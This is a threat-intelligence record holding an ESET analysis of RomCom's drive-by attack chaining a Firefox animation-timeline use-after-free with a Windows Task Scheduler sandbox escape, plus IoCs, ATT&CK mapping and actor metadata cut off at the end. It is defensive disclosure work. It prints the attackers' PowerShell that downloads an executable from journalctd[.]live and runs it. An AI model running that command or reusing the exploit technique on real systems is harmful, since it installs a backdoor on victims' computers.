{ "id": "25ea8725-9dae-4f8c-a39e-d02a62e5b998", "created_at": "2026-04-06T00:16:13.61931Z", "updated_at": "2026-04-10T13:12:17.186591Z", "deleted_at": null, "sha1_hash": "18f0b50c0651fbcca086d2a1154c5e0af48d9ca5", "title": "RomCom exploits Firefox and Windows zero days in the wild", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1072571, "plain_text": "RomCom exploits Firefox and Windows zero days in the wild\r\nBy Damien SchaefferRomain Dumont\r\nArchived: 2026-04-05 16:54:46 UTC\r\nESET researchers discovered a previously unknown vulnerability in Mozilla products, exploited in the wild by\r\nRussia-aligned group RomCom. This is at least the second time that RomCom has been caught exploiting a\r\nsignificant zero-day vulnerability in the wild, after the abuse of CVE-2023-36884 via Microsoft Word in June\r\n2023.\r\nThis critical vulnerability, assigned CVE-2024-9680 with a CVSS score of 9.8, allows vulnerable versions of\r\nFirefox, Thunderbird, and the Tor Browser to execute code in the restricted context of the browser. Chained with\r\nanother previously unknown vulnerability in Windows, assigned CVE-2024-49039 with a CVSS score of 8.8,\r\narbitrary code can be executed in the context of the logged-in user. In a successful attack, if a victim browses to a\r\nweb page containing the exploit, an adversary can run arbitrary code – without any user interaction required –\r\nwhich in this case led to the installation of RomCom’s eponymous backdoor on the victim’s computer.\r\nKey points of this blogpost:\r\nOn October 8th, 2024, ESET researchers discovered a previously unknown zero-day\r\nvulnerability in Mozilla products being exploited in the wild.\r\nAnalysis of the exploit led to the discovery of the vulnerability, now assigned CVE-2024-9680: a\r\nuse-after-free bug in the animation timeline feature in Firefox. Mozilla patched the vulnerability\r\non October 9th, 2024.\r\nFurther analysis revealed another zero-day vulnerability in Windows: a privilege escalation bug,\r\nnow assigned CVE‑2024‑49039, that allows code to run outside of Firefox’s sandbox. Microsoft\r\nreleased a patch for this second vulnerability on November 12th, 2024.\r\nSuccessful exploitation attempts delivered the RomCom backdoor, in what looks like a\r\nwidespread campaign.\r\nRomCom (also known as Storm-0978, Tropical Scorpius, or UNC2596) is a Russia-aligned group that conducts\r\nboth opportunistic campaigns against selected business verticals and targeted espionage operations. The group’s\r\nfocus has shifted to include espionage operations collecting intelligence, in parallel with its more conventional\r\ncybercrime operations. The backdoor used by the group is capable of executing commands and downloading\r\nadditional modules to the victim’s machine.\r\nTable 1 shows the sectors targeted, according to our research, by RomCom in 2024. This highlights that the group\r\nis engaged in espionage but also cybercrime operations.\r\nTable 1. RomCom victims in 2024\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 1 of 20\n\nVertical and region Purpose First seen\r\nGovernmental entity in Ukraine Espionage 2024-01\r\nPharmaceutical sector in the US Cybercrime 2024-03\r\nLegal sector in Germany Cybercrime 2024-03\r\nInsurance sector in the US Cybercrime 2024-04\r\nDefense sector in Ukraine Espionage 2024-08\r\nEnergy sector in Ukraine Espionage 2024-08\r\nGovernmental entities in Europe Espionage 2024-08\r\nWorldwide targeting – Firefox exploit Unknown 2024-10\r\nCompromise chain\r\nThe compromise chain is composed of a fake website that redirects the potential victim to the server hosting the\r\nexploit, and should the exploit succeed, shellcode is executed that downloads and executes the RomCom backdoor\r\n– an example of which is depicted in Figure 1. While we don’t know how the link to the fake website is\r\ndistributed, however, if the page is reached using a vulnerable browser, a payload is dropped and executed on the\r\nvictim’s computer with no user interaction required. Finally, a JavaScript redirection is performed using\r\nwindow.location.href after a few seconds, giving the exploit time to run.\r\nFigure 1. Exploit chain to compromise the victim\r\nFrom October 10th, 2024 to October 16th, 2024, just after the first vulnerability was patched, we found other C\u0026C\r\nservers hosting the exploit. They used a recurring naming scheme for their fake servers by adding the prefix or\r\nsuffix redir or red to a legitimate domain, sometimes also changing its top-level domain (TLD), as shown in Table\r\n2. The redirection at the end of the exploitation attempt took the victims to the legitimate website at the original\r\ndomain name, presumably to avoid raising the targets’ suspicions.\r\nTable 2. Fake servers redirecting to the exploit\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 2 of 20\n\nFirst seen Fake server Final redirect to Redirect website purpose\r\n2024-10-10 redircorrectiv[.]com correctiv.org Nonprofit independent newsroom.\r\n2024-10-14 devolredir[.]com devolutions.net\r\nRemote access and password management\r\nsolutions.\r\n2024-10-15 redirconnectwise[.]cloud connectwise.com MSP technology and IT management\r\nsoftware. 2024\r\n-10-16 redjournal[.]cloud connectwise.com\r\nIf a victim using a vulnerable browser visits a web page serving this exploit, the vulnerability is triggered and\r\nshellcode is executed in a content process. The shellcode is composed of two parts: the first retrieves the second\r\nfrom memory and marks the containing pages as executable, while the second implements a PE loader based on\r\nthe open-source project Shellcode Reflective DLL Injection (RDI).\r\nThe loaded library implements a sandbox escape for Firefox that leads to downloading and executing the\r\nRomCom backdoor on the victim’s computer. The backdoor is staged at a C\u0026C server located at journalctd[.]live,\r\ncorrectiv[.]sbs, or cwise[.]store, depending on the sample.\r\nAccording to our telemetry, from October 10th, 2024 to November 4th, 2024, potential victims who visited\r\nwebsites hosting the exploit were located mostly in Europe and North America, as shown in Figure 2. The number\r\nof potential targets runs from a single victim per country to as many as 250, according to ESET telemetry.\r\nFigure 2. Heatmap of potential victims\r\nCVE-2024-9680: Use-after-free in Firefox animation timeline\r\nOn October 8th, 2024, we found interesting files used to deliver the RomCom backdoor, hosted on the server\r\n1drv.us[.]com controlled by the threat actor. The exploits target a use-after-free vulnerability in Firefox animation\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 3 of 20\n\ntimelines, allowing an attacker to achieve code execution in a content process. During our investigation, we\r\nanalyzed the files referenced in Table 3.\r\nTable 3. Files related to the exploit\r\nName Description\r\nmain-128.js JavaScript file containing the exploit for versions of Firefox from 106 to 128.\r\nmain-129.js JavaScript file containing the exploit for versions of Firefox from 129 to 131.\r\nmain-tor.js JavaScript file containing the exploit for Tor Browser versions 12 and 13.\r\nscript.js JavaScript file used to generate a CAPTCHA.\r\nutils.js\r\nJavaScript file containing helper functions, e.g., to convert data types, or to get the OS\r\ntype or browser version.\r\nanimation0.html HTML iframe loaded by the exploit to trigger the use-after-free vulnerability.\r\nindex.html\r\nHTML page loading the exploit and redirecting to a legitimate website after a few\r\nseconds.\r\nTimestamps related to these files indicate that they were created on October 3rd, 2024 and made available online;\r\nnevertheless, the threat actor might have been in possession of this exploit earlier than this.\r\nWe reported the vulnerability to Mozilla shortly after discovery, with the following timeline of events:\r\n2024-10-08: Discovery and initial analysis.\r\n2024-10-08: Vulnerability reported to Mozilla.\r\n2024-10-08: Vulnerability acknowledged by Mozilla.\r\n2024-10-09: CVE-2024-9680 assigned by Mozilla Corporation.\r\n2024-10-09: Vulnerability patched in Firefox, Security Advisory 2024-51.\r\n2024-10-09: Vulnerability patched in Tor Browser with release 13.5.7.\r\n2024-10-10: Vulnerability patched in Tails with release 6.8.1.\r\n2024-10-10: Vulnerability patched in Thunderbird, Security Advisory 2024-52.\r\nWe would like to thank the team at Mozilla for being very responsive and highlight their impressive work to\r\nrelease a patch within a day.\r\nMozilla and the Tor Project released a patch that fixes the vulnerability in the following versions:\r\nFirefox 131.0.2\r\nFirefox ESR 115.16.1\r\nFirefox ESR 128.3.1\r\nTor Browser 13.5.7\r\nTails 6.8.1\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 4 of 20\n\nThunderbird 115.16\r\nThunderbird 128.3.1\r\nThunderbird 131.0.1\r\nDuring the preparation of this blogpost, independent researcher Dimitri Fourny released a detailed analysis of the\r\nvulnerability on November 14th, 2024.\r\nRoot cause analysis\r\nThe main-\u003cFirefox version\u003e.js first checks the exact version of the browser, and determines its exploitability by\r\nchecking some specific objects’ offsets and sizes for an affected version. If these checks pass, it proceeds to add an\r\nHTML iframe into the exploit page, implemented in animation0.html. The latter creates four HTML div elements\r\nidentified respectively as target0 to target3, but most importantly it defines a getter function for the\r\nObject.prototype’s then property as shown in Figure 3. This function will trigger the use-after-free vulnerability as\r\nexplained below. Note that the comments (in dark green) are from the exploit authors; this could indicate that the\r\nexploit was still in a developmental phase or that the threat actor bought it.\r\nFigure 3. The JavaScript exploit defines the then property’s getter function on every object,\r\ntriggering a use-after-free vulnerability\r\nAfter some initial heap spraying, the prepare function creates four Animation objects, one for each div element\r\npreviously created, as illustrated in Figure 4. These animation objects are handled by an AnimationTimeline\r\nobject.\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 5 of 20\n\nFigure 4. The exploit code creates animation objects for div elements\r\nDuring the document animation timeline, the test function is called, which pauses and gets the ready property of\r\nthe first and second animation objects. As stated in the documentation, the ready property returns a Promise that\r\nresolves when the animation is ready to be played. Calling the then method on the promise causes the getter\r\nfunction shown in Figure 3 to be called. Essentially, this function increments a global flag variable and when it\r\nreaches 2, the first animation object (anim0) is cancelled, and all the div elements are removed. The call to the\r\nrm0 function (shown in Figure 3) sets the animation objects to null in order to free them, which triggers the use-after-free vulnerability. This function also does some heap feng shui and, in the initially discovered exploit, calls\r\nthe getInfo function responsible for achieving code execution.\r\nIn the meantime, as the animation0.html document is being refreshed, the Tick method of its AnimationTimeline\r\nobject is called periodically. As seen in Figure 5, this method iterates over the different animation objects present\r\nin the animation timeline and appends animations to be removed to a local array variable called\r\nanimationsToRemove.\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 6 of 20\n\nFigure 5. In AnimationTimeline::Tick, animation objects to be removed are appended to local array\r\nvariable animationsToRemove\r\nThe bug lies in that, while iterating over the different animation objects of the animation timeline, the Tick method\r\nof the Animation object is called, which can lead to the freeing of the current animation object, resulting in\r\nhandling a dangling pointer. While debugging the exploit, we observed a sequence of calls that eventually ended\r\nup in the getter function explained above, as illustrated in Figure 6 and Figure 7.\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 7 of 20\n\nFigure 6. Call stack of the animation being cancelled by the getter function called via the\r\nAnimation::Tick method\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 8 of 20\n\nFigure 7. The Animation::PauseAt method ends up calling the getter function\r\nThe getter function calls Animation::Cancel which in turn calls AnimationTimeline::RemoveAnimation. Then, the\r\nanimation objects anim0 and anim1 are set to null in order for them to get freed. When AnimationTimeline::Tick\r\nthen iterates over the array animationsToRemove (line 74 in Figure 5), AnimationTimeline::RemoveAnimation\r\nwill manipulate a dangling pointer of an Animation object that was already removed, as shown in Figure 8.\r\nFigure 8. Call stack of the crash in AnimationTimeline::RemoveAnimation while manipulating a\r\ndangling pointer\r\nAfter freeing the animations in the rm0 function, the exploit proceeds with more heap management in order to\r\ncontrol the objects that will replace the freed animations, and finally, the getInfo function is called, as seen in\r\nFigure 9.\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 9 of 20\n\nFigure 9. Exploit code function rm0 triggers the use-after-free bug and exploits it\r\nWithout going into too much detail about the exploit code, its author abused div objects and their attributes as well\r\nas ImageData objects to leak properties of the latter, as observed in Figure 10.\r\nFigure 10. Exploit code getInfo function attempts to leak an ImageData object\r\nThen, the exploit code proceeds to manipulate ArrayBuffer objects so as to leak the address of an arbitrary\r\nJavaScript object (known as an addrof primitive) and abuse the Firefox JIT compiler to execute the first shellcode\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 10 of 20\n\ncomponent in the context of a content process, as illustrated in Figure 11. This technique is explained in great\r\ndetail in this blogpost.\r\nFigure 11. The exploit code abuses the Firefox JIT compiler to execute shellcode\r\nMozilla patched the vulnerability in Firefox 131.0.2, Firefox ESR 128.3.1, and Firefox ESR 115.16.1 on October\r\n9\r\nth\r\n, 2024. Essentially, the pointers to the animation objects handled by the timeline are now implemented through\r\nreference-counting pointers (RefPtr), as suggested by the diff, which prevents the animations from being freed,\r\nsince AnimationTimeline::Tick will still hold a reference to them.\r\nShellcode analysis\r\nBoth shellcodes are stored in the JavaScript exploit file main-\u003cFirefox version\u003e.js. The first one is dynamically\r\ncreated as an array of float numbers while the second one is stored as a huge array of bytes.\r\nEgghunting shellcode\r\nThis first shellcode simply retrieves the second shellcode by searching in memory for a hardcoded magic value of\r\n0x8877665544332211, changes its memory protection to read-write-execute (RWX), and executes the code\r\nlocated at this address.\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 11 of 20\n\nReflective loader shellcode\r\nThis second shellcode is the compiled version of the Shellcode RDI project, which enables a DLL to be loaded.\r\nThe constants used in the shellcode were not changed by the threat actor (see\r\nhttps://github.com/monoxgas/sRDI/blob/master/Native/Loader.cpp#L367 vs. the constants shown in Figure 12).\r\nFigure 12. The constants used in the public Shellcode RDI project remained unchanged\r\nThe shellcode simply loads an embedded library whose sole purpose is to escape the restrictions of Firefox’s\r\nsandboxed content process.\r\nCVE-2024-49039: Privilege escalation in Windows Task Scheduler\r\nThe loaded library (SHA1: ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6), named PocLowIL by its\r\ndevelopers and compiled on October 3rd, 2024, implements a sandbox escape from the untrusted process level of\r\nthe content process to a medium level. Essentially, the library makes use of an undocumented RPC endpoint,\r\nwhich should not have been callable from an untrusted process level, to launch a hidden PowerShell process that\r\ndownloads a second stage from a C\u0026C server.\r\nThe timeline of the vulnerability disclosure is the following:\r\n2024-10-08: As part of our initial report to Mozilla for CVE-2024-9680, we also provided what we\r\nbelieved to be a sandbox escape.\r\n2024-10-14: Mozilla’s security team confirmed the sandbox escape and deemed the vulnerability to be tied\r\nto a Windows security flaw. They advised us that they had contacted the Microsoft Security Response\r\nCenter (MSRC) to assess the vulnerability.\r\n2024-11-12: Microsoft released an advisory for CVE-2024-49039 and its corresponding patch through the\r\nupdate KB5046612. The vulnerability was also independently found by Vlad Stolyarov and Bahare Sabouri\r\nof Google’s Threat Analysis Group, as mentioned in KB5046612.\r\nRoot cause analysis\r\nThe sandbox escape code resides in the relatively small main function of the library. It makes use of an\r\nundocumented RPC endpoint, as illustrated in Figure 13.\r\nFigure 13. The PocLowIL library prepares to interact with a task-related endpoint\r\nThe function proceeds to populate undocumented structures and calls NdrClientCall2 three times. The first\r\nparameter passed to this function, pStubDescriptor, is a MIDL_STUB_DESC structure whose\r\nRpcInterfaceInformation member points to an interface identified by the GUID 33D84484-3626-47EE-8C6F-https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 12 of 20\n\nE7E98B113BE1. This interface is implemented in the Windows library WPTaskScheduler.dll, loaded by\r\nschedsvc.dll, hosted in the process of the task scheduler service (svchost.exe).\r\nAccording to our analysis of this interface, the sandbox escape code calls the following functions:\r\ns_TaskSchedulerCreateSchedule\r\ns_TaskSchedulerExecuteSchedule\r\ns_TaskSchedulerDeleteSchedule (used only for cleanup)\r\nUsing RpcView and after partially reversing some structures, we figured out the main structures, as illustrated in\r\nFigure 14.\r\nFigure 14. The main structures used to create a scheduled task through the RPC interface\r\nAfter applying these structures in IDA Pro, we obtained a clearer overview of the task, as seen in Figure 15.\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 13 of 20\n\nFigure 15. IDA Pro pseudocode view of the sandbox escape code\r\nBased on the code, the malicious library creates a scheduled task that will run an arbitrary application at medium\r\nintegrity level, allowing the attackers to elevate their privileges on the system and break out of the sandbox. This\r\nis possible due to the lack of restrictions imposed on the security descriptor applied to the RPC interface during its\r\ncreation, as illustrated in Figure 16.\r\nFigure 16. Permissive security descriptor applied to the RPC interface\r\nThe renamed variable interface_security_descriptor, used when RpcServerRegisterIf3 is called, has the following\r\nvalue: D:P(A;;GA;;;S-1-15-2-1)(A;;GA;;;WD). According to the Security Descriptor Definition Language\r\n(SDDL), it allows everyone (WD) to communicate with the RPC interface and call its procedures regardless of\r\ntheir integrity level.\r\nExploitation\r\nIn this case, the threat actor created a task named firefox.exe that will launch conhost.exe in headless mode in\r\norder to hide the child process window. The deobfuscation of the rest of the command line (shown in Figure 15)\r\nrevealed the PowerShell code seen in Figure 17.\r\n$a=$env:public + '\\\\public';\r\nInvoke-WebRequest https://journalctd[.]live/JfWb4OrQPLh -o $a;\r\nsleep 15;\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 14 of 20\n\nRename-Item $a ($a = ($a + '.exe')) # $env:public\\public.exe\r\nStart-Process $a;\r\nsleep 10;\r\nRename-Item $a ($a = ($a -replace 'public.e', 'epublic.e')) # $env:public\\epublic.exe\r\nStart-Process $a\r\nFigure 17. PowerShell code downloading a next-stage component\r\nAn executable is downloaded from https://journalctd[.]live/JfWb4OrQPLh, stored in the %PUBLIC% folder as\r\npublic.exe, and run. After 10 seconds, it is renamed as epublic.exe and run again.\r\nBrief patch analysis\r\nThe patched version of WPTaskScheduler.dll (version 10.0.19041.5129) released with KB5046612 makes use of a\r\nmore complicated security descriptor, as shown in Figure 18.\r\nFigure 18. The security descriptor introduced by the patch is more restrictive\r\nThe new security descriptor is:\r\nD:(A;;GRGWGX;;;SY)(A;;GRGWGX;;;LS)(A;;GR;;;NS)(A;;GR;;;IU)S:(ML;;NWNXNR;;;ME)\r\nBreaking down the string reveals the following restriction logic:\r\nthe system (SY) and local service (LS) accounts are granted read, write, and execute access,\r\nthe network service (NS) account and interactive users (IU) are granted only read access,\r\nlastly, objects below medium level (ME) integrity are denied read, write, and execute access.\r\nThe new restrictions imposed by the updated security descriptor prevent the privilege escalation and render the\r\nsandbox escape code obsolete.\r\nConclusion\r\nChaining together two zero-day vulnerabilities armed RomCom with an exploit that requires no user interaction.\r\nThis level of sophistication shows the threat actor’s will and means to obtain or develop stealthy capabilities.\r\nESET shared detailed findings with Mozilla, following our coordinated vulnerability disclosure process shortly\r\nafter discovery. Mozilla released a blogpost about how they reacted to the disclosure and were able to release a fix\r\nwithin 25 hours, which is very impressive in comparison to industry standards.\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 15 of 20\n\nFor any inquiries about our research published on WeLiveSecurity, please contact us at\r\nthreatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this\r\nservice, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 Filename Detection Description\r\nA4AAD0E2AC1EE0C8DD25\r\n968FA4631805689757B6\r\nutils.js JS/Exploit.Agent.NSF\r\nRomCom Firefox\r\nexploit.\r\nCA6F8966A3B2640F49B1\r\n9434BA8C21832E77A031\r\nmain-tor.js JS/Exploit.Agent.NSE\r\nRomCom Firefox\r\nexploit.\r\n21918CFD17B378EB4152\r\n910F1246D2446F9B5B11\r\nmain-128.js JS/Exploit.Agent.NSE\r\nRomCom Firefox\r\nexploit.\r\n703A25F053E356EB6ECE\r\n4D16A048344C55DC89FD\r\nmain-129.js JS/Exploit.Agent.NSE\r\nRomCom Firefox\r\nexploit.\r\nABB54C4751F97A9FC1C9\r\n598FED1EC9FB9E6B1DB6\r\nPocLowIL.dll Win64/Runner.AD\r\nRomCom Firefox\r\nsandbox escape.\r\nA9D445B77F6F4E90C29E\r\n385264D4B1B95947ADD5\r\nPocLowIL.dll Win64/Runner.AD\r\nRomCom Tor browser\r\nsandbox escape.\r\nNetwork\r\nIP Domain Hosting provider First seen Details\r\n194.87.189[.]171 journalctd[.]live Aeza International LTD 2024-10-08\r\nRomCom second-stage C\u0026C server.\r\n178.236.246[.]241 correctiv[.]sbs\r\nAEZA\r\nINTERNATIONAL\r\nLTD\r\n2024-10-09\r\nRomCom second-stage C\u0026C server.\r\n62.60.238[.]81 cwise[.]store\r\nAEZA\r\nINTERNATIONAL\r\nLTD\r\n2024-10-15\r\nRomCom second-stage C\u0026C server.\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 16 of 20\n\nIP Domain Hosting provider First seen Details\r\n147.45.78[.]102\r\nredircorrectiv\r\n[.]com\r\nAEZA\r\nINTERNATIONAL\r\nLTD\r\n2024-10-10\r\nRomCom exploit\r\ndelivery C\u0026C server.\r\n46.226.163[.]67 devolredir[.]com\r\nAEZA\r\nINTERNATIONAL\r\nLTD\r\n2024-10-14\r\nRomCom exploit\r\ndelivery C\u0026C server.\r\n62.60.237[.]116\r\nredirconnectwise\r\n[.]cloud\r\nAEZA\r\nINTERNATIONAL\r\nLTD\r\n2024-10-15\r\nRomCom exploit\r\ndelivery C\u0026C server.\r\n62.60.237[.]38 redjournal[.]cloud\r\nAEZA\r\nINTERNATIONAL\r\nLTD\r\n2024-10-16\r\nRomCom exploit\r\ndelivery C\u0026C server.\r\n194.87.189[.]19 1drv.us[.]com\r\nAEZA\r\nINTERNATIONAL\r\nLTD\r\n2024-10-08\r\nRomCom malware\r\ndelivery C\u0026C server.\r\n45.138.74[.]238\r\neconomistjournal\r\n[.]cloud\r\nAEZA\r\nINTERNATIONAL\r\nLTD\r\n2024-10-16\r\nRomCom exploit\r\nredirection C\u0026C\r\nserver.\r\n176.124.206[.]88 N/A\r\nAEZA\r\nINTERNATIONAL\r\nLTD\r\n2024-10-08\r\nRomCom second-stage C\u0026C server.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 16 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1583 Acquire Infrastructure\r\nRomCom sets up VPSes and buys\r\ndomain names.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nRomCom develops malware in multiple\r\nprogramming languages.\r\nT1587.004 Develop Capabilities: Exploits\r\nRomCom may develop exploits used for\r\ninitial compromise.\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 17 of 20\n\nTactic ID Name Description\r\nT1588.003\r\nObtain Capabilities: Code\r\nSigning Certificates\r\nRomCom obtains valid code-signing\r\ncertificates to sign its malware.\r\nT1588.005 Obtain Capabilities: Exploits\r\nRomCom may acquire exploits used for\r\ninitial compromise.\r\nT1588.006\r\nObtain Capabilities:\r\nVulnerabilities\r\nRomCom may obtain information about\r\nvulnerabilities it uses for targeting\r\nvictims.\r\nT1608 Stage Capabilities\r\nRomCom stages malware on multiple\r\ndelivery servers.\r\nInitial Access T1189 Drive-by Compromise\r\nRomCom compromises victims through\r\na user visiting a website hosting an\r\nexploit.\r\nExecution T1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nRomCom creates a scheduled task using\r\nRCP to execute the next stage\r\ndownloader.\r\nPersistence T1546.015\r\nEvent Triggered Execution:\r\nComponent Object Model\r\nHijacking\r\nThe RomCom backdoor hijacks DLLs\r\nloaded by explorer.exe or wordpad.exe\r\nfor persistence.\r\nPrivilege\r\nEscalation\r\nT1068\r\nExploitation for Privilege\r\nEscalation\r\nRomCom exploits a vulnerability to\r\nescape the Firefox sandbox.\r\nDefense\r\nEvasion\r\nT1622 Debugger Evasion\r\nThe RomCom backdoor detects\r\ndebuggers by registering an exception\r\nhandler.\r\nT1480 Execution Guardrails\r\nThe RomCom backdoor checks whether\r\nthe system state is suitable for\r\nexecution.\r\nT1027.011\r\nObfuscated Files or\r\nInformation: Fileless Storage\r\nThe RomCom backdoor is stored\r\nencrypted in the registry.\r\nT1553.002\r\nSubvert Trust Controls: Code\r\nSigning\r\nThe RomCom backdoor weakens\r\nsecurity mechanisms by using trusted\r\ncode-signing certificates.\r\nCredential\r\nAccess\r\nT1555.003 Credentials from Password\r\nStores: Credentials from Web\r\nThe RomCom backdoor collects\r\npasswords, cookies, and sessions using\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 18 of 20\n\nTactic ID Name Description\r\nBrowsers a browser stealer module.\r\nT1552.001\r\nUnsecured Credentials:\r\nCredentials In Files\r\nThe RomCom backdoor collects\r\npasswords using a file reconnaissance\r\nmodule.\r\nDiscovery\r\nT1087 Account Discovery\r\nThe RomCom backdoor collects\r\nusername, computer, and domain data.\r\nT1518 Software Discovery\r\nThe RomCom backdoor collects\r\ninformation about installed software and\r\nversions.\r\nT1614 System Location Discovery\r\nThe RomCom backdoor checks for a\r\nspecific keyboard layout ID (KLID).\r\nLateral\r\nMovement\r\nT1021 Remote Services\r\nThe RomCom backdoor creates SSH\r\ntunnels to move laterally within\r\ncompromised networks.\r\nCollection\r\nT1560 Archive Collected Data\r\nThe RomCom backdoor stores data in a\r\nZIP archive for exfiltration.\r\nT1185 Man in the Browser\r\nThe RomCom backdoor steals browser\r\ncookies, history, and saved passwords.\r\nT1005 Data from Local System\r\nThe RomCom backdoor collects\r\nspecific file types based on file\r\nextensions.\r\nT1114.001\r\nEmail Collection: Local Email\r\nCollection\r\nThe RomCom backdoor collects files\r\nwith .msg, .eml, and .email extensions.\r\nT1113 Screen Capture\r\nThe RomCom backdoor takes\r\nscreenshots of the victim’s computer.\r\nCommand and\r\nControl\r\nT1071.001\r\nStandard Application Layer\r\nProtocol: Web Protocols\r\nThe RomCom backdoor uses HTTP or\r\nHTTPS as a C\u0026C protocol.\r\nT1573.002\r\nEncrypted Channel:\r\nAsymmetric Cryptography\r\nThe RomCom backdoor encrypts\r\ncommunication using SSL certificates.\r\nExfiltration T1041\r\nExfiltration Over Command-and-Control ChannelThe RomCom backdoor exfiltrates data\r\nusing the HTTPS C\u0026C channel.\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 19 of 20\n\nTactic ID Name Description\r\nImpact\r\nT1565 Data Manipulation\r\nRomCom manipulates systems and\r\nsteals data.\r\nT1657 Financial Theft\r\nRomCom compromises companies for\r\nfinancial interest.\r\nSource: https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nhttps://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/" ], "report_names": [ "romcom-exploits-firefox-and-windows-zero-days-in-the-wild" ], "threat_actors": [ { "id": "fecc0d5a-3654-425d-9290-b6d0b4105463", "created_at": "2023-10-17T02:00:08.330061Z", "updated_at": "2026-04-10T02:00:03.37711Z", "deleted_at": null, "main_name": "Void Rabisu", "aliases": [ "Tropical Scorpius" ], "source_name": "MISPGALAXY:Void Rabisu", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "555e2cac-931d-4ad4-8eaa-64df6451059d", "created_at": "2023-01-06T13:46:39.48103Z", "updated_at": "2026-04-10T02:00:03.342729Z", "deleted_at": null, "main_name": "RomCom", "aliases": [ "UAT-5647", "Storm-0978" ], "source_name": "MISPGALAXY:RomCom", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d58052ba-978b-4775-985a-26ed8e64f98c", "created_at": "2023-09-07T02:02:48.069895Z", "updated_at": "2026-04-10T02:00:04.946879Z", "deleted_at": null, "main_name": "Tropical Scorpius", "aliases": [ "DEV-0978", "RomCom", "Storm-0671", "Storm-0978", "TA829", "Tropical Scorpius", "UAC-0180", "UNC2596", "Void Rabisu" ], "source_name": "ETDA:Tropical Scorpius", "tools": [ "COLDDRAW", "Cuba", "Industrial Spy", "PEAPOD", "ROMCOM", "ROMCOM RAT", "SingleCamper", "SnipBot" ], "source_id": "ETDA", "reports": null }, { "id": "4f56bb34-098d-43f6-a0e8-99616116c3ea", "created_at": "2024-06-19T02:03:08.048835Z", "updated_at": "2026-04-10T02:00:03.870819Z", "deleted_at": null, "main_name": "GOLD FLAMINGO", "aliases": [ "REF9019 ", "Tropical Scorpius ", "UAC-0132 ", "UAC0132 ", "UNC2596 ", "Void Rabisu " ], "source_name": "Secureworks:GOLD FLAMINGO", "tools": [ "Chanitor", "Cobalt Strike", "Cuba", "Meterpreter", "Mimikatz", "ROMCOM RAT" ], "source_id": "Secureworks", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": 